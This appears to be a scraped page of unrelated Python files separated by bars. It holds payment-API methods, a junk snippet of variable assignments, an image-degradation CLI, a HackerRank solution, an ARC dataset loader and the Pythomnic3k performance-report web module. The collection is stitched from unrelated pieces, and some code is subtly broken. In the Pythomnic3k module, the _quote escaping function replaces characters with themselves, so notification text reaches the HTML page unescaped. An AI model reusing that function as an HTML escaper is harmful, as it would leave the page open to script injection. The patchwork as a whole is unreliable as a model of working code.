headers = self.client._get_private_headers()
endpoint = '/payments/{}/captures'.format(payment_id)
return self.client._get(self.client.URL_BASE + endpoint, headers=headers)
def retrieve_capture(self, *, payment_id, capture_id):
headers = self.client._get_private_headers()
endpoint = '/payments/{}/captures/{}'.format(payment_id, capture_id)
return self.client._get(self.client.URL_BASE + endpoint, headers=headers)
|
number1 = 10
number2 = 20
number3 = 30
number4 = 40
number = 50
number = 505050505050
for i in range(5):
print(i)
gaoshenghedahaoren
w s ni d laoban
|
#############################################################################
#
# VFRAME Synthetic Data Generator
# MIT License
# Copyright (c) 2019 Adam Harvey and VFRAME
# https://vframe.io
#
#############################################################################
import click
from vframe.settings import app_cfg
@click.command()
@click.option('-i', '--input', 'opt_input', required=True,
help='Path to input directory of images')
@click.option('-o', '--output', 'opt_output', required=True,
help='Path to output directory to save degraded images')
@click.option('--slice', 'opt_slice', type=(int, int), default=(None, None),
help='Slice list of files')
@click.option('-t', '--threads', 'opt_threads',
help='Number threads')
@click.option('-e', '--ext', 'opt_exts', default=['jpg', 'png'],
multiple=True,
help='Glob extension')
@click.pass_context
def cli(ctx, opt_input, opt_output, opt_slice, opt_threads, opt_exts):
"""Degrades images, save to another directory"""
from os.path import join
import random
from PIL import Image
import pandas as pd
from glob import glob
from pathlib import Path
import cv2 as cv
import numpy as np
from tqdm import tqdm
from pathos.multiprocessing import ProcessingPool as Pool
from pathos.multiprocessing import cpu_count
from vframe.utils import log_utils, file_utils, im_utils
from vframe.utils.degrade_utils import quality, zoom_shift, scale
from vframe.utils.degrade_utils import motion_blur_v, motion_blur_h
from vframe.utils.degrade_utils import enhance, auto_adjust
from vframe.utils.degrade_utils import chromatic_aberration
log = app_cfg.LOG
log.info('Degrade data to match target domain')
if opt_input == opt_output:
log.error('Input can not equal output directory. Change input or output.')
return
opt_threads = opt_threads if opt_threads else cpu_count()
file_utils.ensure_dir(opt_output)
# glob images
fps_ims = file_utils.glob_multi(opt_input, exts=opt_exts, sort=True)
if any(opt_slice):
fps_ims = fps_ims[opt_slice[0]:opt_slice[1]]
log.info(f'found {len(fps_ims)} images in {opt_input}')
# multiproc pool
def pool_worker(fp_im):
im = cv.imread(fp_im)
try:
w, h = im.shape[:2][::-1]
except Exception as e:
log.error(f'Could not process: {fp_im}. {e}')
return
# randomly degrade image
im = quality(im, value_range=(30, 90), alpha_range=(0.5, 1.0), rate=1.0)
# im = motion_blur_v(im, value_range=(0.01, 0.1), alpha_range=(0.25, 0.75), rate=0.15)
# im = motion_blur_h(im, value_range=(0.01, 0.1), alpha_range=(0.25, 0.75), rate=0.15)
# im = scale(im, value_range=(0.05, 0.1), rate=0.15)
im = zoom_shift(im, value_range=(1, 6), alpha_range=(0.1, 0.6), rate=0.1)
im = enhance(im, 'sharpness', value_range=(0.5, 6.0), rate=0.15)
im = enhance(im, 'brightness', value_range=(0.75, 1.25), rate=0.15)
im = enhance(im, 'contrast', value_range=(0.75, 1.25), rate=0.15)
im = enhance(im, 'color', value_range=(0.75,1.25), rate=0.15)
im = auto_adjust(im, 'equalize', alpha_range=(0.05, 0.1), rate=0.15) # caution
im = auto_adjust(im, 'autocontrast', alpha_range=(0.1, 0.5), rate=0.15)
im = chromatic_aberration(im, 0, value_range=(1, 1), rate=0.1)
im_pil = im_utils.np2pil(im)
fp_out = join(opt_output, Path(fp_im).name)
cv.imwrite(fp_out, im)
# fill pool
with Pool(opt_threads) as p:
d = f'Degrading x{opt_threads}'
pool_results = list(tqdm(p.imap(pool_worker, fps_ims), total=len(fps_ims), desc=d))
|
#!/bin/python3
# Complete the separateNumbers function below.
def separateNumbers(s):
n = len(s)
i = 1
while i <= n // 2:
j = i
a = int(s[:i])
flag = 1
while j < n:
b = str(a + 1)
if s[j:j + len(b)] != b:
flag = 0
break
j += len(b)
a = int(b)
if flag:
print('YES ' + s[:i])
return
i += 1
print('NO')
return
if __name__ == '__main__':
q = int(input())
for q_itr in range(q):
s = input()
separateNumbers(s)
|
# coding=utf-8
# Copyright 2022 The HuggingFace Datasets Authors and DataLab Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import os
import datalabs
from datalabs.tasks import QuestionAnsweringMultipleChoicesWithoutContext
# TODO(ai2_arc): BibTeX citation
_CITATION = """\
@article{allenai:arc,
author = {Peter Clark and Isaac Cowhey and Oren Etzioni and Tushar Khot and
Ashish Sabharwal and Carissa Schoenick and Oyvind Tafjord},
title = {Think you have Solved Question Answering? Try ARC, the AI2 Reasoning Challenge},
journal = {arXiv:1803.05457v1},
year = {2018},
}
"""
# TODO(ai2_arc):
_DESCRIPTION = """\
A new dataset of 7,787 genuine grade-school level, multiple-choice science questions, assembled to encourage research in
advanced question-answering. The dataset is partitioned into a Challenge Set and an Easy Set, where the former contains
only questions answered incorrectly by both a retrieval-based algorithm and a word co-occurrence algorithm. We are also
including a corpus of over 14 million science sentences relevant to the task, and an implementation of three neural baseline models for this dataset. We pose ARC as a challenge to the community.
"""
_URL = "https://s3-us-west-2.amazonaws.com/ai2-website/data/ARC-V1-Feb2018.zip"
class Ai2ArcConfig(datalabs.BuilderConfig):
"""BuilderConfig for Ai2ARC."""
def __init__(self, **kwargs):
"""BuilderConfig for Ai2Arc.
Args:
**kwargs: keyword arguments forwarded to super.
"""
super(Ai2ArcConfig, self).__init__(version=datalabs.Version("1.0.0", ""), **kwargs)
class Ai2Arc(datalabs.GeneratorBasedBuilder):
"""TODO(arc): Short description of my dataset."""
# TODO(arc): Set up version.
VERSION = datalabs.Version("1.0.0")
BUILDER_CONFIGS = [
Ai2ArcConfig(
name="ARC-Challenge",
description="""\
Challenge Set of 2590 “hard” questions (those that both a retrieval and a co-occurrence method fail to answer correctly)
""",
),
Ai2ArcConfig(
name="ARC-Easy",
description="""\
Easy Set of 5197 questions
""",
),
]
def _info(self):
# TODO(ai2_arc): Specifies the datasets.DatasetInfo object
return datalabs.DatasetInfo(
# This is the description that will appear on the datasets page.
description=_DESCRIPTION,
# datasets.features.FeatureConnectors
features=datalabs.Features(
{
"id": datalabs.Value("string"),
"question": datalabs.Value("string"),
"options": datalabs.features.Sequence(datalabs.Value("string")),
"answers": # answers -> answerKey
{
"text": datalabs.Value("string"),
"option_index": datalabs.Value("int32"),
},
# These are the features of your dataset like images, labels ...
}
),
# If there's a common (input, target) tuple from the features,
# specify them here. They'll be used if as_supervised=True in
# builder.as_dataset.
supervised_keys=None,
# Homepage of the dataset for documentation
homepage="https://allenai.org/data/arc",
citation=_CITATION,
task_templates=[
QuestionAnsweringMultipleChoicesWithoutContext(
question_column="question", answers_column="answers",
options_column="options",
task="question-answering-multiple-choices-without-context",
)
],
)
def _split_generators(self, dl_manager):
"""Returns SplitGenerators."""
# TODO(ai2_arc): Downloads the data and defines the splits
# dl_manager is a datasets.download.DownloadManager that can be used to
# download and extract URLs
dl_dir = dl_manager.download_and_extract(_URL)
data_dir = os.path.join(dl_dir, "ARC-V1-Feb2018-2")
return [
datalabs.SplitGenerator(
name=datalabs.Split.TRAIN,
# These kwargs will be passed to _generate_examples
gen_kwargs={"filepath": os.path.join(data_dir, self.config.name, self.config.name + "-Train.jsonl")},
),
datalabs.SplitGenerator(
name=datalabs.Split.TEST,
# These kwargs will be passed to _generate_examples
gen_kwargs={"filepath": os.path.join(data_dir, self.config.name, self.config.name + "-Test.jsonl")},
),
datalabs.SplitGenerator(
name=datalabs.Split.VALIDATION,
# These kwargs will be passed to _generate_examples
gen_kwargs={"filepath": os.path.join(data_dir, self.config.name, self.config.name + "-Dev.jsonl")},
),
]
def _generate_examples(self, filepath):
"""Yields examples."""
# TODO(ai2_arc): Yields (key, example) tuples from the dataset
dict_map = {"A": 0, "B": 1, "C": 2, "D": 3, "E": 4, "F": 5, "G": 6, "H": 7, "I": 8, "J": 9, "K": 10}
id_sample = 0
with open(filepath, encoding="utf-8") as f:
for row in f:
id_sample+=1
data = json.loads(row)
answerkey = data["answerKey"]
id_ = data["id"]
question = data["question"]["stem"]
choices = data["question"]["choices"]
text_choices = [choice["text"] for choice in choices]
label_choices = [choice["label"] for choice in choices]
option_index = dict_map[answerkey]
yield id_, {
"id": str(id_sample - 1),
"question": question,
"options": text_choices,
"answers": # answers -> answerKey
{
"text": text_choices[option_index],
"option_index": option_index,
},
# "answerKey": answerkey,
# "choices": {"text": text_choices, "label": label_choices},
}
|
#!/usr/bin/env python3
#-*- coding: iso-8859-1 -*-
###############################################################################
#
# This module implements the performance graph displaying HTTP interface.
# If the "performance" interface has been started in config_interfaces.py,
# this module is called to process HTTP request incoming through it.
# Returned to each request is an interactive clickable text-only
# HTML page with performance diagrams.
#
# The working of this module is intimately tied with the internals of
# performance.py, for example it is presumed that there are exactly two
# kinds of performance readings - rates and times, and they have particular
# names, such as resource.foo.transaction_rate. The ranges (last hour plus
# one last minute) and scaling (0-39) of the collected data are also fixed
# to match that of the performance.py's (see extract() method).
#
# Pythomnic3k project
# (c) 2005-2014, Dmitry Dvoinikov <dmitry@targeted.org>
# Distributed under BSD license
#
################################################################################
__all__ = [ "process_request" ]
################################################################################
import io; from io import StringIO
import datetime; from datetime import datetime, timedelta
import urllib.parse; from urllib.parse import urlparse
if __name__ == "__main__": # add pythomnic/lib to sys.path
import os; import sys
main_module_dir = os.path.dirname(sys.modules["__main__"].__file__) or os.getcwd()
sys.path.insert(0, os.path.normpath(os.path.join(main_module_dir, "..", "..", "lib")))
import typecheck; from typecheck import typecheck, optional, by_regex, with_attr, \
dict_of, nothing
###############################################################################
# unicode box characters
b1 = "▁"; b2 = "▂"; b3 = "▃"; b4 = "▄"
b5 = "▅"; b6 = "▆"; b7 = "▇"; b8 = full_block = "█"
box_chars = (b1, b2, b3, b4, b5, b6, b7, b8)
###############################################################################
# this method takes low-high value in range 0-39 and returns a single
# representing bar character
@typecheck
def _collapsed_bar(s: optional((int, int))) -> str:
if s is None:
return " "
low, high = s; assert 0 <= low <= high <= 39
return box_chars[high // 5]
###############################################################################
# this method takes low-high value in range 0-39 and returns a column of 5
# representing characters, the ones prefixed with ~ should appear in negative
@typecheck
def _expanded_bar(s: optional((int, int))) -> [str, str, str, str, str]:
if s is None:
return [" "] * 5
low, high = s; assert 0 <= low <= high <= 39
low_idx, low_level = divmod(low, 8)
high_idx, high_level = divmod(high, 8)
result = [" "] * low_idx
if low_idx < high_idx:
result.append(low_level > 0 and ("~" + box_chars[low_level - 1]) or full_block)
result.extend([full_block] * (high_idx - low_idx - 1))
result.append(box_chars[high_level])
result.extend([" "] * (4 - high_idx))
return result
###############################################################################
# this method replaces certain formatting characters with fancy box-drawing ones
def _decorate(line: str) -> str:
result = ""
pc = None
for c in line:
if c == " ":
if pc != " ": result += "<span class=\"bk\">"
result += full_block
else:
if pc == " ": result += "</span>"
if c == "-": result += "—"
elif c == "+": result += "·"
elif c == "_": result += " "
elif c == "~": result += "―"
elif c == "*": result += "+"
else: result += c
pc = c
if pc == " ": result += "</span>"
return result
###############################################################################
def _quote(s):
return s.replace("&", "&").replace("<", "<").replace(">", ">").\
replace("\"", """).replace("'", "'")
###############################################################################
_hrule = "---------+---------+---------+---------+---------+---------+---------+"
_ref_times = list(map(_decorate, ["10.0~", " 3.0~", " 1.0~", " 0.3~", " 0.1~"]))
_ref_rates = list(map(_decorate, [" 100~", " 30~", " 10~", " 3~", " 1~"]))
legends = { "request_rate": "request rate",
"response_rate": "response rate",
"response_rate.success": "successful response rate",
"response_rate.failure": "failed responses rate",
"transaction_rate": "transaction rate",
"transaction_rate.success": "successful transaction rate",
"transaction_rate.failure": "failed transaction rate",
"pending_time": "pending time",
"processing_time": "processing time",
"processing_time.success": "successful processing time",
"processing_time.failure": "failed processing time",
"response_time": "response time",
"response_time.success": "successful response time",
"response_time.failure": "failed response time" }
default_reading_modes = { "interface": ("response_time", "collapsed"),
"resource": ("processing_time" , "collapsed") }
optional_readings = { "interface": ("request_rate", "pending_time", "processing_time", "response_time"),
"resource": ("transaction_rate", "pending_time", "processing_time") }
css_style = """\
<style type=\"text/css\"><!--
.default {{ color: black; background-color: white; vertical-align: bottom; font-family: {css_font_family:s}; }}
.bk {{ color: white }}
.c4 {{ color: green }}
.c4i {{ color: white; background-color: green }}
.c3 {{ color: forestgreen }}
.c3i {{ color: white; background-color: forestgreen }}
.c2 {{ color: yellowgreen }}
.c2i {{ color: white; background-color: yellowgreen }}
.c1 {{ color: goldenrod }}
.c1i {{ color: white; background-color: goldenrod }}
.c0 {{ color: orangered }}
.c0i {{ color: white; background-color: orangered }}
a {{ color: darkblue; text-decoration: none }}
//--></style>"""
###############################################################################
# this method takes a dict containing parsed URL query and one of the optional
# mangling arguments, assembles and returns string with modified URL query
def _format_modified_query(query: dict, *, expand = None, collapse = None, replace = None):
d = query.copy()
if expand:
d[expand] = "expanded"
if collapse:
d[collapse] = "collapsed"
if replace:
k, reading = replace
del d[k]
k = ".".join(k.split(".", 2)[:2]) + "." + reading
d[k] = "expanded"
return "&".join("{0:s}={1:s}".format(k, v) for k, v in d.items())
###############################################################################
@typecheck
def _performance_report(html: with_attr("write"), query: dict_of(str, str),
request: dict, response: dict) -> nothing:
# fetch the performance dump, this can return None
stats = pmnc.performance.extract()
if stats is None:
html.write("<html><body>cage {0:s} has nothing to report yet"
"</body></html>".format(__cage__))
return
# extract main thread pool stats
req_active, req_pending, req_rate = pmnc.interfaces.get_activity_stats()
# extract global transaction rate
xa = pmnc.transaction.create(); xa.execute()
txn_rate = xa.get_transaction_rate()
base_time, stats_dump, app_perf = stats
base_dt = datetime.fromtimestamp(base_time)
# see data for what objects is available, will have to display at least one graph for each
monitored_objects = set(tuple(k.split(".", 2)[:2]) for k in stats_dump.keys())
requested_objects = set(tuple(k.split(".", 2)[:2]) for k in query.keys())
displayed_objects = {}
for object_type, object_name in monitored_objects - requested_objects:
reading, mode = default_reading_modes[object_type]
displayed_objects["{0:s}.{1:s}.{2:s}".format(object_type, object_name, reading)] = mode
# add/override explicitly requested graphs from the URL query
for k, v in query.items():
if k in stats_dump:
displayed_objects[k] = v
# reassemble the canonical URL query
canonical_query = _format_modified_query(displayed_objects)
# format horizontal time scales
base_minute = base_dt.minute % 10
hrule = "---- " + _hrule[base_minute:][:59] + " -----"
plus_count = hrule.count("+")
base_dt10m = datetime.fromtimestamp(base_time // 600 * 600)
base_dt10m -= timedelta(minutes = (plus_count - (base_minute != 0 and 1 or 0)) * 10)
hhmms = [ (base_dt10m + timedelta(minutes = i * 10)).strftime("%H:%M")
for i in range(plus_count) ]
hscale = " " * (hrule.index("+") - 2) + " ".join(hhmms)
hscale += " " * (len(hrule) - len(hscale) - 5) + base_dt.strftime("%H:%M")
hrule = _decorate(hrule)
hscale = _decorate(hscale)
# format header
cpu_ut_percent = int(app_perf.get("cpu_ut_percent", 0.0))
cpu_kt_percent = int(app_perf.get("cpu_kt_percent", 0.0))
if cpu_kt_percent > 0:
cpu_percent = "{0:d}*{1:d}".format(cpu_ut_percent, cpu_kt_percent)
else:
cpu_percent = "{0:d}".format(cpu_ut_percent)
cage_at_node = "cage {0:s} at node {1:s}".format(__cage__, __node__)
activity_info = "{0:d}{1:s} req, {2:.01f} req/s, {3:.01f} txn/s, {4:d} M RAM, {5:s} % CPU".\
format(req_active, req_pending and "*{0:d}".format(req_pending) or "",
req_rate, txn_rate, app_perf.get("wss", 0), cpu_percent)
# write page header
html.write("<html>"
"<head>" +
css_style.format(css_font_family = pmnc.config.get("css_font_family")) +
"<title>Performance report for " + cage_at_node + "</title>"
"</head>"
"<body class=\"default\">"
"<a href=\"/notifications\">logs</a>" + _decorate(" {0:s}<br/>".format(cage_at_node.center(58))) +
_decorate(" {0:s} {1:s}<br/><br/>\n".format(activity_info.center(58), base_dt.strftime("%b %d"))))
html.write("<span style=\"line-height: 1.0;\">\n" + hscale + "<br/>\n" + hrule + "<br/>\n")
# loop through the statistics items to display
for k, mode in sorted(displayed_objects.items()):
if k not in stats_dump: # invalid interface/resource name in URL ?
continue
s1m, s10s = stats_dump[k]
s10s = s10s[:5]
object_type, object_name, reading = k.split(".", 2)
if mode == "collapsed": # draw collapsed graph
def append_bars(b):
result = ""
for i, v in enumerate(b):
c = _collapsed_bar(v)
high = v is not None and v[1] or 0
result += "<span_class=\"c{0:d}\">{1:s}</span>".format(4 - high // 8, c)
return result
line = "<nobr> {0:s} {1:s} ".format(append_bars(s1m), append_bars(s10s))
html.write(_decorate(line))
# append the clickable expand link
expand_query = _format_modified_query(displayed_objects, expand = k)
html.write("<a href=\"/performance?{0:s}\">{1:s} {2:s} ({3:s})</a></nobr><br/>".\
format(expand_query, object_type, object_name, legends[reading]))
elif mode == "expanded": # draw expanded graph
bars1m = list(zip(*map(_expanded_bar, s1m)))
bars10s = list(zip(*map(_expanded_bar, s10s)))
def append_bars(b, i):
result = ""
b = b[4 - i]
for j in range(len(b)):
c = b[j]
if c.startswith("~"):
result += "<span_class=\"c{0:d}i\">{1:s}</span>".format(i, c[1:]) # note the underscore, will be converted to space
else:
result += c
return result
# expanded form has vertical scale, different for rates and times
if "_time" in k:
ref = _ref_times
elif "_rate" in k:
ref = _ref_rates
# draw each of the 5 horizontal bars
opt_readings = optional_readings[object_type]
for i in range(5):
line = "<nobr>" + ref[i] + "<span class=\"c{0:d}\">".format(i)
_line = append_bars(bars1m, i)
_line += "</span> ~ <span_class=\"c{0:d}\">".format(i) + append_bars(bars10s, i) + " "
line += _decorate(_line) + "</span>"
if i == 0: # append the clickable collapse link
collapse_query = _format_modified_query(displayed_objects, collapse = k)
line += "<a href=\"/performance?{0:s}\">{1:s} {2:s}</a>".\
format(collapse_query, object_type, object_name)
elif i <= len(opt_readings): # append the clickable selector links
opt_reading = opt_readings[i - 1]
modify_query = _format_modified_query(displayed_objects, replace = (k, opt_reading))
line += "{0:s}<a href=\"/performance?{1:s}\">{2:s}</a>{3:s}".\
format(reading == opt_reading and _decorate("» ") or _decorate(" "),
modify_query, legends[opt_reading],
reading == opt_reading and _decorate(" «") or _decorate(" "))
html.write(line + "</nobr><br/>\n")
html.write(hrule + "<br/>\n")
# complete the response
html.write(hscale + "<br/>\n</span>\n</body></html>")
# require a refresh within a configured time
refresh_seconds = pmnc.config.get("refresh_seconds")
response["headers"]["refresh"] = \
"{0:d};URL=/performance?{1:s}".format(refresh_seconds, canonical_query)
###############################################################################
@typecheck
def _notifications_report(html: with_attr("write"), query: dict_of(str, str),
request: dict, response: dict) -> nothing:
# reassemble the canonical URL query
canonical_query = "&".join("{0:s}={1:s}".format(k, v) for k, v in query.items())
# format header
cage_at_node = "cage {0:s} at node {1:s}".format(__cage__, __node__)
# write page header
html.write("<html>"
"<head>" +
css_style.format(css_font_family = pmnc.config.get("css_font_family")) +
"<title>Notifications report for " + cage_at_node + "</title>"
"</head>"
"<body class=\"default\">"
"<a href=\"/performance\">perf</a>" + _decorate(" {0:s}<br/>".format(cage_at_node.center(58))) +
_decorate("most recent health monitor notifications".center(69)) + "<br/><br/>")
# extract stored notifications and loop through it
last_day = None
for notification in reversed(pmnc.notify.extract()):
message = _quote(notification["message"])
timestamp = notification["timestamp"]
day = datetime.fromtimestamp(timestamp).strftime("%b %d")
hms = datetime.fromtimestamp(timestamp).strftime("%H:%M:%S")
level = notification["level"]
if level == "INFO":
level = "<span class=\"c4\">INFO </span>"
elif level == "WARNING":
level = "<span class=\"c1\">WARN </span>"
elif level == "ERROR":
level = "<span class=\"c0\">ERROR</span>"
elif level == "ALERT":
level = "<strong><span class=\"c0\">ALERT</span></strong>"
if day != last_day:
html.write(_decorate(" {0:s} ----------------------------------------------------------------<br/>\n".format(day)))
last_day = day
html.write("{0:s} {1:s} <nobr>{2:s}</nobr><br/>\n".\
format(hms, level, message))
# complete the response
html.write(_decorate("------------------------------------------------------------------------<br/>\n"))
html.write("</body></html>")
# require a refresh within a configured time
refresh_seconds = pmnc.config.get("refresh_seconds")
response["headers"]["refresh"] = \
"{0:d};URL=/notifications?{1:s}".format(refresh_seconds, canonical_query)
###############################################################################
valid_perf_query_element = "(interface|resource)\\.[A-Za-z0-9_-]+\\.({0:s})=(collapsed|expanded)".\
format("|".join(legends.keys()))
valid_perf_query = by_regex("^({0:s}(&{0:s})*)?$".format(valid_perf_query_element))
valid_ntfy_query = by_regex("^$")
###############################################################################
# this method is called from the HTTP interface for actual request processing
def process_request(request: dict, response: dict):
parsed_url = urlparse(request["url"])
path = parsed_url.path
query = parsed_url.query
html = StringIO()
if path in ("/", "/performance"):
if not valid_perf_query(query):
raise Exception("invalid query format")
query = query and dict(p.split("=") for p in query.split("&")) or {}
_performance_report(html, query, request, response)
elif path == "/notifications":
if not valid_ntfy_query(query):
raise Exception("invalid query format")
query = query and dict(p.split("=") for p in query.split("&")) or {}
_notifications_report(html, query, request, response)
else:
response["status_code"] = 404
return
response["content"] = html.getvalue()
response["headers"]["content-type"] = "text/html"
###############################################################################
def self_test():
from time import sleep
from pmnc.request import fake_request
###################################
def test_collapsed_bar():
assert _collapsed_bar(None) == " "
for low in range(40):
for high in range(low + 1, 40):
assert _collapsed_bar((low, high)) == box_chars[high // 5]
test_collapsed_bar()
###################################
def test_expanded_bar():
assert _expanded_bar(None) == [" ", " ", " ", " ", " "]
assert _expanded_bar((0, 0)) == [b1, " ", " ", " ", " "]
assert _expanded_bar((0, 1)) == [b2, " ", " ", " ", " "]
assert _expanded_bar((0, 4)) == [b5, " ", " ", " ", " "]
assert _expanded_bar((0, 7)) == [b8, " ", " ", " ", " "]
assert _expanded_bar((0, 8)) == [b8, b1, " ", " ", " "]
assert _expanded_bar((0, 9)) == [b8, b2, " ", " ", " "]
assert _expanded_bar((0, 39)) == [b8, b8, b8, b8, b8]
assert _expanded_bar((1, 38)) == ["~" + b1, b8, b8, b8, b7]
assert _expanded_bar((4, 35)) == ["~" + b4, b8, b8, b8, b4]
assert _expanded_bar((7, 32)) == ["~" + b7, b8, b8, b8, b1]
assert _expanded_bar((8, 31)) == [" ", b8, b8, b8, " "]
assert _expanded_bar((9, 30)) == [" ", "~" + b1, b8, b7, " "]
assert _expanded_bar((12, 27)) == [" ", "~" + b4, b8, b4, " "]
assert _expanded_bar((15, 24)) == [" ", "~" + b7, b8, b1, " "]
assert _expanded_bar((16, 23)) == [" ", " ", b8, " ", " "]
assert _expanded_bar((17, 22)) == [" ", " ", b7, " ", " "]
assert _expanded_bar((20, 20)) == [" ", " ", b5, " ", " "]
assert _expanded_bar((0, 15)) == [b8, b8, " ", " ", " "]
assert _expanded_bar((12, 27)) == [" ", "~" + b4, b8, b4, " "]
assert _expanded_bar((24, 39)) == [" ", " ", " ", b8, b8]
assert _expanded_bar((32, 39)) == [" ", " ", " ", " ", b8]
assert _expanded_bar((35, 39)) == [" ", " ", " ", " ", b8]
assert _expanded_bar((39, 39)) == [" ", " ", " ", " ", b8]
test_expanded_bar()
###################################
def test_notifications():
request = dict(url = "/notifications",
method = "GET", headers = {}, body = b"")
response = dict(status_code = 200, headers = {}, body = b"")
pmnc.__getattr__(__name__).process_request(request, response)
assert response["status_code"] == 200
content = response["content"]
assert "Notifications report" in content
test_notifications()
###################################
def test_performance():
fake_request(120.0)
for i in range(90):
pmnc.performance.event("interface.foo.response_rate.success")
pmnc.performance.sample("interface.foo.response_time.success", 10)
pmnc.performance.event("resource.bar.transaction_rate.success")
pmnc.performance.sample("resource.bar.processing_time.success", 10)
sleep(1.0)
pmnc.log("wait {0:d}/90".format(i + 1))
request = dict(url = "/?"
"interface.foo.request_rate=expanded&"
"interface.foo.response_rate.success=collapsed&"
"interface.foo.response_time=expanded&"
"interface.foo.response_time.success=collapsed&"
"resource.bar.transaction_rate=expanded&"
"resource.bar.transaction_rate.success=collapsed&"
"resource.bar.processing_time=expanded&"
"resource.bar.processing_time.success=collapsed",
method = "GET", headers = {}, body = b"")
response = dict(status_code = 200, headers = {}, body = b"")
pmnc.__getattr__(__name__).process_request(request, response)
assert response["status_code"] == 200
content = response["content"]
# difficult to assert anything reasonable about the response content here
assert "10.0" in content and "100" in content
assert "interface foo (successful response rate)" in content
assert "interface foo (successful response time)" in content
assert "resource bar (successful transaction rate)" in content
assert "resource bar (successful processing time)" in content
assert "request rate</a>" in content
assert "response time</a>" in content
assert "transaction rate</a>" in content
assert "processing time</a>" in content
assert "RAM" in content
assert "CPU" in content
test_performance()
if __name__ == "__main__": import pmnc.self_test; pmnc.self_test.run()
###############################################################################
# EOF
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.